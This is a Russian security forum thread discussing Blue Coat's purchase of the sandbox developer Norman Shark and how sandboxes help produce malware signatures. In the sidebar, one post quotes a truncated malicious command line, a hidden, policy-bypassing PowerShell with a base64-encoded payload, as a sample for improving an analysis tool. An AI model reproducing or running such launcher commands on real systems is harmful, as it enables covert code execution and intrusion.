Перейти к содержанию
AM_Bot

Blue Coat приобретает компанию Norman Shark

Recommended Posts

AM_Bot

Bluecoat-logo01[1]_0.jpgКомпания Blue Coat Systems, сообщила о покупке Norman Shark. Данное приобретение позволит объединить наиболее продвинутую технологию Sandbox («песочница») для защиты от уязвимостей «нулевого дня» с ведущим решением Blue Coat для расширенной защиты от угроз, что позволит компаниям преодолеть временной разрыв между обнаружением угроз и их устранением.

подробнее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Интересная новость. Norman Shark делала не что иное как песочницу. А теперь Blue Coat каким-то образом собираются интегрировать ее в свои продукты.

Интересно, что по этому поводу думает Илья Рабинович?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Илья Рабинович
Интересно, что по этому поводу думает Илья Рабинович?

А он думает, что для NIPS-ов очень важно иметь сигнатуры вредоносных кодов раньше, чем у конкурентов (тут как в анекдоте: важно бежать не быстрее тигра, а быстрее коллеги по путешествию), и для этого нужно автоматическое распознавание зловредных кодов краулером на сайтах и хонейпотами для е-мейлов. Вот тут и пригодится автоматическая система детектирования вредоносного поведения на основе виртуальной среды исполнения (так называемая исследовательская антивирусная песочница), где всё это богатство с тёмной стороны можно безопасно запустить, автоматически сгенерировать сигнатуры и сразу же разослать обновление баз по конечным устройствам. Так что всё звучит разумно с точки зрения логики покупки технологии и персонала компании Norman.

Если и говорить про поглощения "песочных" разработчиков, основной акцент которых сделан на безопасности конечных точек, то я, скорее, сделал бы акцент на поглощении Sandboxie компанией Invincea.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×